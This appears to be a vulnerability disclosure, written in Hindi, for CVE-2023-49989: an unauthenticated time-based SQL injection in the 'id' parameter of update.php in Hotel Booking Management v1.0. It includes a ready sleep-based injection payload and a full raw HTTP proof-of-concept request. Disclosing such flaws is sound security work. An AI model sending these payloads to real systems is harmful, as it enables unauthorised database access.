
होटल बुकिंग प्रबंधन v1.0 - update.php में "id" पैरामीटर में SQL इंजेक्शन भेद्यता
विवरण: Hotel Booking Management v1.0 में update.php पर id पैरामीटर के माध्यम से SQL इंजेक्शन भेद्यता पाई गई।
प्रभावित उत्पाद संस्करण: Hotel Booking Management v1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि तिथि: 19/12/2023
CVE: CVE-2023-49989
परीक्षण किया गया: Windows
भेद्यता का शोषण करने के लिए, एक हमलावर को केवल कमजोर 'id' पैरामीटर के माध्यम से update.php को SQL इंजेक्शन पेलोड भेजने की आवश्यकता होती है। किसी प्रमाणीकरण की आवश्यकता नहीं है। http://{{IP}}/HotelBookingManagement-main/update.php?id=1%20and%20(select*from(select(sleep(20)))a)--%20
GET /HotelBookingManagement-main/update.php?id=1%20and%20(select*from(select(sleep(5)))a)--%20 HTTP/1.1
Host: 192.168.68.148
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
खोजकर्ता/श्रेय:
Geraldo Alcântara